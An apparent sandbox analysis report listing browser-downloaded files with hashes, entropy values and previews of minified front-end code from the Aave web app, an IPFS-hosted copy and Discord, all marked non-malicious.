                                                                                                                                                                                                                                                  SSDEEP:96:3a2DXHcwlin8kmlWFxiK97RFuPukdIZS0meUfvQYJxuRMUNmLRSfsxFMuBugtOgf:zDswlwLFxiKbF6VdISr4YJxIL8LRQsxz
                                                                                                                                                                                                                                                  MD5:DC166250138041181DE591E21AA7192A
                                                                                                                                                                                                                                                  SHA1:C4A8A2A91FFC7BB0E31C0E1A77D23E620D679664
                                                                                                                                                                                                                                                  SHA-256:117970265C5AFD32CB55CF648A87AA89AFB4F6D23EB6F8F2691DA508BC208AA8
                                                                                                                                                                                                                                                  SHA-512:E71725052E86E1BA8ACDBC408C5BC6CBE5C96D3C24DBE4A6ED63C9C6FF425D81BE979417A8C925E6EF31F65B0DA527EB98AA7B981FFF8FBC8A42FCBA8B113A66
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9388],{89388:function(e,t,n){n.r(t),n.d(t,{StakeModal:function(){return G}});var r=n(67294),o=n(8195),a=n(31959),i=n(49501),s=n(75331),c=n(1279),u=n(29630),l=n(77912),d=n(60265),p=n(77537),m=n(78371),v=n(84568),k=n(63206),x=n(57609),f=n(54401),b=n(53601),g=n(63491),h=n(67916),j=n(93608),y=n(57824),N=n(78944),T=n(10343),O=n(59499),S=n(50029),A=n(4730),w=n(87794),E=n.n(w),P=n(89291),C=n(67489),_=n(85893),I=["amountToStake","isWrongNetwork","sx","symbol","blocked","selectedToken","event"];function D(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}var U,W=function(e){var t=e.amountToStake,n=e.isWrongNetwork,r=e.sx,o=e.symbol,a=e.blocked,c=e.selectedToken,u=(e.event,(0,A.Z)(e,I)),l=(0,m.Y)(),d=l.stake,p=l.stakeWithPermit,v=c!==s.hj.bpt,k=(0,P.Q)({tryPermit:v,per
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (15744), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):15744
                                                                                                                                                                                                                                                  Entropy (8bit):5.248482024601397
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:eWdEOWhlahl+PSaq3qAdzTpw5Ur664iCCw79AyIxLsu9qWZkuJsb6:MbS733pTqjPiCC69mLeW
                                                                                                                                                                                                                                                  MD5:33A79C9556F37933B9CB90566F1D1AD1
                                                                                                                                                                                                                                                  SHA1:8020F6502557AFC541179470FFD04E3FBEB7D0B0
                                                                                                                                                                                                                                                  SHA-256:15276E68799F7F3BAF8CDB0E61517941ED276E81DEDF0D4F5FB4A31F8549D004
                                                                                                                                                                                                                                                  SHA-512:A5981F6B139D05D14B2C73B8B01B635BCE2A2DED7CE212CAE78A22D0192299468DDF3CB20055FAF8BEA4311BB3D13242ECDCCE4AD6B744FB71CC28A2A849A9C2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/7603.58cb27010e0a12d8.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7603],{57333:function(t,e,r){var o=r(67294);function n(){}function a(t){return!!(t||"").match(/\d/)}function i(t){return null===t||void 0===t}function s(t){return t.replace(/[-[\]/{}()*+?.\\^$|]/g,"\\$&")}function u(t,e){void 0===e&&(e=!0);var r="-"===t[0],o=r&&e,n=(t=t.replace("-","")).split(".");return{beforeDecimal:n[0],afterDecimal:n[1]||"",hasNagation:r,addNegation:o}}function l(t,e,r){for(var o="",n=r?"0":"",a=0;a<=e-1;a++)o+=t[a]||n;return o}function p(t,e){return Array(e+1).join(t)}function c(t,e){if(t.value=t.value,null!==t){if(t.createTextRange){var r=t.createTextRange();return r.move("character",e),r.select(),!0}return t.selectionStart||0===t.selectionStart?(t.focus(),t.setSelectionRange(e,e),!0):(t.focus(),!1)}}function f(t,e,r){return Math.min(Math.max(t,e),r)}function h(t){return Math.max(t.selectionStart,t.selectionEnd)}var m={displayType:"input",decimalSeparator:".",thousandsGroupStyle:"thousand",fixe
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):64626
                                                                                                                                                                                                                                                  Entropy (8bit):6.02769221429177
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:ZQeY8TVOfra3xt+FSDOBBN+0aVWBU3shY3AJFRt2H/ALdlEBR9E3:ZQRsOfl0qe0akBU3su3Af/2HIp2y3
                                                                                                                                                                                                                                                  MD5:7344A5F876779F04558C37786F08EE01
                                                                                                                                                                                                                                                  SHA1:52461CCAE0CEEC68277D1B10F08FDE73B66CA2D5
                                                                                                                                                                                                                                                  SHA-256:E5EC6630C9522E637813EB49BFF3042C67251403713CBB9630B3C9CE9CCAE129
                                                                                                                                                                                                                                                  SHA-512:879955EA34C2D963D6832427FBD27175488ED13D48B749056774EAD3C899E10E7F2EABACE5E26D0F3BEF207082409242029E8FE31125EB2E2742CD09D670842E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg width="254" height="254" viewBox="0 0 254 254" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path fill="#9391F7" style="fill:color(display-p3 .5765 .5686 .9686);fill-opacity:1" d="M0 0h254v254H0z"/><circle cx="127" cy="127" r="119" fill="#fff" stroke="#9391F7" style="fill:#fff;fill-opacity:1;stroke:color(display-p3 .5765 .5686 .9686);stroke-opacity:1" stroke-width="16"/><path fill="url(#a)" d="M36 110h87v88H36z"/><rect x="131" y="110" width="87" height="88" rx="43.5" fill="url(#b)"/><rect x="82" y="29" width="87" height="88" rx="43.5" fill="url(#c)"/><defs><pattern id="a" patternContentUnits="objectBoundingBox" width="1" height="1"><use xlink:href="#d" transform="matrix(.002 0 0 .00197 -.006 0)"/></pattern><pattern id="b" patternContentUnits="objectBoundingBox" width="1" height="1"><use xlink:href="#e" transform="matrix(.00506 0 0 .005 -.006 0)"/></pattern><pattern id="c" patternContentUnits="objectBoundingBox" width="1" height="1"><use
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12681), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):12681
                                                                                                                                                                                                                                                  Entropy (8bit):5.405332495061492
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:RyPmL764xzJX42xrAXChKN/iN/a6mgAJGbYsL4:RyPi7nzJDxkXC4ViValnJGbk
                                                                                                                                                                                                                                                  MD5:7F8C1022ED8876BB6FA7559FE69B8759
                                                                                                                                                                                                                                                  SHA1:22993C83AA0CBFB22AE7D24C66BE86D3E2DA1ADB
                                                                                                                                                                                                                                                  SHA-256:E01944D2D04402EF9AB03AE9C65CF52604E44759DA539C13337D80CD6426A8A7
                                                                                                                                                                                                                                                  SHA-512:C4A2CF6C9932A99D2AF9DC01B02EB20823F09961860CA6852A3F68EF2F8054576C6113249B2907765E8147E170FFC841501537DD698E0D9E264A5632D2948A71
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7566],{62753:function(e,t,r){"use strict";var n=r(64836);t.Z=void 0;var o=n(r(64938)),i=r(85893),s=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=s},89722:function(e,t,r){"use strict";r.d(t,{Z:function(){return y}});var n=r(87462),o=r(63366),i=r(67294),s=r(86010),a=r(94780),c=r(81719),u=r(78884),l=r(36622),f=r(34867);function d(e){return(0,f.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var p=r(85893);const v=["baseClassN
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (13984), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13984
                                                                                                                                                                                                                                                  Entropy (8bit):5.462369483972633
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:7FIHq7gabbnWPjjdBegOiiSg51bCsTUjFIHJ9Kxpj:7D7Db6PjjygOzX51VAaY
                                                                                                                                                                                                                                                  MD5:13F538B82E157080EB149BB81C238B7E
                                                                                                                                                                                                                                                  SHA1:643A1E66252F352431D18E805F4EC1622C357DFD
                                                                                                                                                                                                                                                  SHA-256:6710FB443F5333A5CEA97E5C3CDBDB843E3E2D7FFD15FA1CC8A9217E05EDB19F
                                                                                                                                                                                                                                                  SHA-512:96FE6A948A463C208BA9D77C2CFAF301CA610C5186A453F1908840764545910939DF7EDCF7EC90DD3FF53E3E3F116F253BAE32443115C053DB79341055E5FD56
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4284],{50020:function(e,n,r){var t=r(59499),o=r(4730),i=r(91655),s=r(30120),a=r(29630),c=(r(67294),r(46839)),l=r(41024),d=r(85893),p=["minVal","maxVal","percentVariant","hyphenVariant"];function u(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwnPropertySymbols(e);n&&(t=t.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),r.push.apply(r,t)}return r}function x(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?u(Object(r),!0).forEach((function(n){(0,t.Z)(e,n,r[n])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):u(Object(r)).forEach((function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}))}return e}n.Z=function(e){var n=e.minVal,r=e.maxVal,t=e.percentVariant,u=e.hyphenVariant,h=(0,o.Z)(e,p),f=(0,c.HT)(),m=f.ghoLoadingData,j=f.ghoReserveData;if(m)return(0,d.js
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17999), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):17999
                                                                                                                                                                                                                                                  Entropy (8bit):5.3461849776191706
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:W0ZgR0IFVkEuku9ZS+1QIn2i/LND5lFbtQR0eTuN5qNAPgsYprx4BzZ9w:W0+C++1Hn2wpFbtQ8fqNbsYpr6BI
                                                                                                                                                                                                                                                  MD5:AEB4B75242C0596883D15DAB60DE970E
                                                                                                                                                                                                                                                  SHA1:096A104EE8A232349E8F07BB320D57FD5015498F
                                                                                                                                                                                                                                                  SHA-256:74A03F1CEBB5271446C07D491D407E2CAB97D88560A5BE2BBD7F4F36753B6775
                                                                                                                                                                                                                                                  SHA-512:6A81FA24DA8F8F713D97E06323B44C7766021A7BA07E7F508F59613BC2A1D254115085582D838940D929D2AE9C3CD4B32DBFCE67D5C5E55A6E2492BDA584CFDF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/6538.c29c8d91ac649877.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6538],{89722:function(e,n,t){t.d(n,{Z:function(){return v}});var r=t(87462),o=t(63366),i=t(67294),s=t(86010),a=t(94780),c=t(81719),l=t(78884),u=t(36622),d=t(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,t(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=t(85893);const f=["baseClassName","className","color","component","fontSize"],x=(0,c.ZP)("span",{name:"MuiIcon",slot:"Root",overridesResolver:(e,n)=>{const{ownerState:t}=e;return[n.root,"inherit"!==t.color&&n[`color${(0,u.Z)(t.color)}`],n[`fontSize${(0,u.Z)(t.fontSize)}`]]}})((({theme:e,ownerState:n})=>({userSelect:"none",width:"1em",height:"1em",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (13675), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13675
                                                                                                                                                                                                                                                  Entropy (8bit):5.535113943109992
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:U9wPt8LSMeG6I8Jy6n/GRnx6eAyQRbZjSzRI7bKNJjZK6h12V0vdB:9DEqGRnx6eAya8zRI7OzFK6h12S
                                                                                                                                                                                                                                                  MD5:E10D7FCEA044C91DD86128C0589DD6A0
                                                                                                                                                                                                                                                  SHA1:9FF2045CF1F007EE354AA03782B9734C19F0893B
                                                                                                                                                                                                                                                  SHA-256:E31E8B1810F2E28E0EA27E23ECB7EF6B2D5A0019172AB1628E0D4310066C5727
                                                                                                                                                                                                                                                  SHA-512:403B85789144F94E2DCEA9A8BBB9C4E9E11446A953C29E6FAEF2F41559AA1BC31F0FC4F18C1BC870CAC79683DDE7686B9645880646FD9DEF816F9348C29164E2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8019],{45884:function(e,t,r){r.d(t,{h:function(){return i}});var o=r(30120),n=r(85893),i=function(e){var t=e.isRow,r=e.children,i=e.minWidth,s=e.maxWidth,a=e.align,l=void 0===a?"center":a,c=e.overFlow,u=void 0===c?"visible":c,d=e.flex,p=void 0===d?1:d,b=e.p,f=void 0===b?1:b;return(0,n.jsx)(o.Z,{sx:{display:"flex",flexDirection:t?"row":"column",alignItems:t?"center":"left"===l?"flex-start":"right"===l?"flex-end":l,justifyContent:t?"flex-start":"flex-end",flex:p,minWidth:i||"70px",maxWidth:s,overflow:u,padding:f},children:r})}},32383:function(e,t,r){r.d(t,{H:function(){return u}});var o=r(59499),n=r(4730),i=r(30120),s=r(85893),a=["children","minHeight","px","button"];function l(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,o)}return r}function c(e){for(var t=1;t<argume
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8077), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):8077
                                                                                                                                                                                                                                                  Entropy (8bit):5.7648844506520485
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:t5ngG1UZQNibj/AhUKM1DQNL9A1eBrlP3:t5ngFZoibj/AhUKI8hAK5v
                                                                                                                                                                                                                                                  MD5:87C72B2EB8778E2A89A1D107308145B1
                                                                                                                                                                                                                                                  SHA1:CF034744C94ACF8BC8590DFE4AC7A1A4D37B7106
                                                                                                                                                                                                                                                  SHA-256:F20C57E144A2911219EC4B120242D7807F18497DC845B227A4F57271A0ECDE89
                                                                                                                                                                                                                                                  SHA-512:17478464122C00A0E4B2090CB77AB3DC990EE1DA0B230C3B82F3CC3C60F89BB960484AF3B19A96522EBA1120AE526FD8B965A95A69B86D24224E467CD710BC9E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js?
                                                                                                                                                                                                                                                  Preview:window._cf_chl_opt={cFPWv:'g'};~function(V,g,h,i,j,n,o,v){V=b,function(d,e,U,f,C){for(U=b,f=d();!![];)try{if(C=parseInt(U(312))/1*(parseInt(U(329))/2)+-parseInt(U(347))/3*(-parseInt(U(325))/4)+-parseInt(U(334))/5+-parseInt(U(373))/6*(parseInt(U(367))/7)+-parseInt(U(344))/8+-parseInt(U(306))/9+-parseInt(U(293))/10*(-parseInt(U(359))/11),e===C)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,864393),g=this||self,h=g[V(342)],i={},i[V(362)]='o',i[V(368)]='s',i[V(296)]='u',i[V(310)]='z',i[V(331)]='n',i[V(323)]='I',j=i,g[V(278)]=function(C,D,E,F,a0,H,I,J,K,L,M){if(a0=V,D===null||D===void 0)return F;for(H=m(D),C[a0(332)][a0(353)]&&(H=H[a0(346)](C[a0(332)][a0(353)](D))),H=C[a0(318)][a0(294)]&&C[a0(360)]?C[a0(318)][a0(294)](new C[(a0(360))](H)):function(N,a1,O){for(a1=a0,N[a1(333)](),O=0;O<N[a1(345)];N[O+1]===N[O]?N[a1(369)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a0(380)][a0(381)](I),J=0;J<H[a0(345)];K=H[J],L=l(C,D,K),I(L)?(M=L==='s'&&!C[a0(339)](D[K]),a0(350)===E+K?G(E
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):2058
                                                                                                                                                                                                                                                  Entropy (8bit):4.614306214221163
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:CVHe7HtOty0VulV1/8CXP0Cjek7aj4clug9ai:iANEyxx8UPTXaj4cogIi
                                                                                                                                                                                                                                                  MD5:E1349377226366F95F85AB9EAC4586D3
                                                                                                                                                                                                                                                  SHA1:9A3A00B6E6AB0A240363F4E4DB2F5288227FF76B
                                                                                                                                                                                                                                                  SHA-256:2CA673A9914A35A230469A8A0FD6B4DB293B236DEA391633B53339AFE577A92E
                                                                                                                                                                                                                                                  SHA-512:7C16967D1960CDE4914F71B6FE347A7764AAED42366A87920597D225F3874B5B34A00C5089564BEBF0A919C419049DB99B27128CC81BC28A1492460FD199F9E7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/a5ec2b74d0cc337d4481.svg
                                                                                                                                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 45 45" xml:space="preserve">. <defs>. <clipPath id="a" clipPathUnits="userSpaceOnUse">. <path d="M0 36h36V0H0v36Z"/>. </clipPath>. <mask id="b">. <g>. <rect x="0" y="0" width="100" height="100" fill="white" />. <path d="M11.708 29.849a1.296 1.296 0 1 0-2.591-.001 1.296 1.296 0 0 0 2.591 0" fill="black"/>. </g>. </mask>. </defs>. <g>. <g>. <g clip-path="url(#a)" transform="matrix(1.25 0 0 -1.25 0 45)" mask="url(#b)">. <g>. <path d="M12.75 18.25c1.226-2.195 1.855 1.361 9.313 2.625 7.457 1.264 13.728-4.454 13.859-5.413C36.053 14.504 31.474 6 26.459 6h-15.71C6.607 6 3.727 13.224 6.75 17.438c0 0 4.5 3.5 6 .812" fill="white"/>. </g>. <g>. <path d="M13.008 17.864C8.02 10.927 6.968 6 10.75 6c-4.142 0-6.577 6.187-4.468 11.031.463 1.064 1.758 2.492 1.758 2.492l4.18.008c.162-.32.598-1.366.79-1.667" fill="white"/>. </g>. <g>. <path d
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (27123), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):27123
                                                                                                                                                                                                                                                  Entropy (8bit):5.469697319357853
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:VwOhrkc7ke71uDW75r0r6chebEbE9Ef33zEY75lCwyQCfeBOXBx:V3L5ErQmfYK5I7feBOXBx
                                                                                                                                                                                                                                                  MD5:2BC0A0AEA6267FDE477D702B391BA533
                                                                                                                                                                                                                                                  SHA1:DCBB2751358C91D2E65DAC5B4CD2CB79156B1237
                                                                                                                                                                                                                                                  SHA-256:C2DD9C63F403CBECBD829B2280B00F74B80F3F9C85ED0567B8F19FD78963EDCE
                                                                                                                                                                                                                                                  SHA-512:9774443A1CE709B48E3D999FD0956FA7FFF34DE4066BDEEEC7A3CC3C9659635B14FD78D8F13DCB3CB8CF500BB608C1582F4E1F8727B9CD193C7DAD81AECF912C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1162],{4840:function(e,t,n){"use strict";n.r(t),n.d(t,{MarketContainer:function(){return ye},default:function(){return fe},marketContainerProps:function(){return je}});var r=n(59499),i=n(64288),s=n(30120),a=n(67294),o=n(70675),l=n(49501),c=n(80854),d=n(62097),x=n(61225),u=n(29630),p=n(54181),h=n(45556),m=n(13850),j=n(68861),y=n(69331),f=n(28480),b=n(14795),g=n(73965),v=n(46930),w=n(14379),Z=n(45884),O=n(99435),D=n(1475),C=n(36864),P=n(75084),A=n(11163),k=n(14249),S=n(42115),T=n(44749),E=n(14463),I=n(19547),L=n(58527),N=n(85642),_=n(78371),V=n(57609),M=n(52906),U=n(35161),W=n(32383),B=n(41024),F=n(72667),z=n(85893),Y=function(e){var t,n=(0,C.Z)({},e),r=(0,A.useRouter)(),i=(0,v.f)().currentMarket,a=(0,_.Y)((function(e){return e.trackEvent})),o=null===(t=N.U[i])||void 0===t?void 0:t[n.symbol];return(0,z.jsxs)(W.H,{px:6,minHeight:76,onClick:function(){a(V.uZ.DETAILS_NAVIGATION,{type:"Row",assetName:n.name,asset:n.underlyingAsset,mark
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):1956
                                                                                                                                                                                                                                                  Entropy (8bit):7.26159273591798
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:0Mhu18+/bwHXdbyD3xm5vYs2W2PjDCjSFq:Rs1hMHNbGA5AsyCuFq
                                                                                                                                                                                                                                                  MD5:D0A3E0C4B340CE843FE788ED6BF16947
                                                                                                                                                                                                                                                  SHA1:6661FED613E61C9D918256C23A6622CF26BAA8A2
                                                                                                                                                                                                                                                  SHA-256:BCEE214086F13292DFE8E6B17AF55D7AA977830C2C7F45A1905FE9A1FC359022
                                                                                                                                                                                                                                                  SHA-512:41BECA98A90AD9B69C611A345FDA710158DE18DA68BBFD1F3F2D905D98E885B8884F1DDA2C87CA2BFB6662A6998DB3490136B29D7B4FE20EFA8DB5B3D778BF22
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://cdn.discordapp.com/icons/602826299974877205/85edbf0edebc2025a16a76b89b1cb937.webp?size=64
                                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8X....0...?..?..ICCP........appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl....8.G.m..Oz../................................desc.......0cprt...,...Pwtpt...|....rXYZ........gXYZ........bXYZ........rTRC....... chad.......,bTRC....... gTRC....... mluc............enUS.........D.i.s.p.l.a.y. .P.3mluc............enUS...4.....C.o.p.y.r.i.g.h.t. .A.p.p.l.e. .I.n.c...,. .2.0.2.2XYZ ...............,XYZ ..........=.....XYZ ......J....7....XYZ ......(8.......para..........ff......Y.......[sf32.......B.......&.......................nALPHc.....b....T.).f.....Of._8..Ge.Y(...OJ.g....."..$I2..<....h.a.......m..$....7...]).b..E r..l.>..=[..=+....E..W..~.1,.i.U.j.T..Y.,....k.V..hX..........^..x.C.....2...{.....a......aW0....3..%..jLTc..&,#........hT.F.h......1x.'.G.4.F.*4%~....4b...M.{....D.$.g|7I...Sr..;...9..(E....[.......[V.I.....u"q;".=.....]oU..7o...>...c..$j..m...`......VP8 ....p....*@.@.>a&.E."!....@....b...../.g..{...Ao9...@....
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (13325)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13374
                                                                                                                                                                                                                                                  Entropy (8bit):5.33229367944175
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:c9jPMDYeG0dPbPDjzw4WDhiElYrskCLdHWQBC7dr1m+8LBpDtOnyUotvLfQE2u:c9jPMRLjZ0usbxwdr1QBpDtOy3JT
                                                                                                                                                                                                                                                  MD5:D0C788B157FF96A2DD902C97BFC889F6
                                                                                                                                                                                                                                                  SHA1:6CDE0BD611B34B15CA15437CA5AC4F77DE01ADA8
                                                                                                                                                                                                                                                  SHA-256:05A00FBAFFC4A7254C9B631FF0E81BE546DC275BE1D6F992C36849222D0B73F7
                                                                                                                                                                                                                                                  SHA-512:170615E3DE829D517662BE32C762B76B013163FA040C2EEDF89C865A9CEE1CEEDA7EE305BE27CD3A724832571A94B5A26FB3BB9D9A1D1C5386081F206A1E1436
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["78187"],{526988:function(t,n,r){var e=r(354848),o=r(938507),i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not a function")}},24033:function(t,n,r){var e=r(622281),o=String,i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not an object")}},953326:function(t,n,r){var e=r(299623),o=r(980855),i=r(49693),u=function(t){return function(n,r,u){var c,f=e(n),a=i(f),s=o(u,a);if(t&&r!=r){for(;a>s;)if((c=f[s++])!=c)return!0}else for(;a>s;s++)if((t||s in f)&&f[s]===r)return t||s||0;return!t&&-1}};t.exports={includes:u(!0),indexOf:u(!1)}},332916:function(t,n,r){var e=r(581031),o=e({}.toString),i=e("".slice);t.exports=function(t){return i(o(t),8,-1)}},381740:function(t,n,r){var e=r(740362),o=r(666061),i=r(347722),u=r(97131);t.exports=function(t,n,r){for(var c=o(n),f=u.f,a=i.f,s=0;s<c.length;s++){var p=c[s];!e(t,p)&&!(r&&e(r,p))&&f(t,p,a(n,p))}}},251069:function(t,n,r){var e=r
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):353
                                                                                                                                                                                                                                                  Entropy (8bit):4.642302632357146
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:3vUqH2fqHd/UkN62LrONwXLjQeoGez2vNijtcdpwr2G+2dCgGTO:fU000hUmJrJLLbNipcdpK+2QDTO
                                                                                                                                                                                                                                                  MD5:67A935AA296D3919EF7040430C582AD0
                                                                                                                                                                                                                                                  SHA1:FD3436E630EC872CD25F97205835AE98DE4F7944
                                                                                                                                                                                                                                                  SHA-256:31964C87D57872F61B1178D809073AB30AC7B1342C78A910E04A88FAEBAB4C14
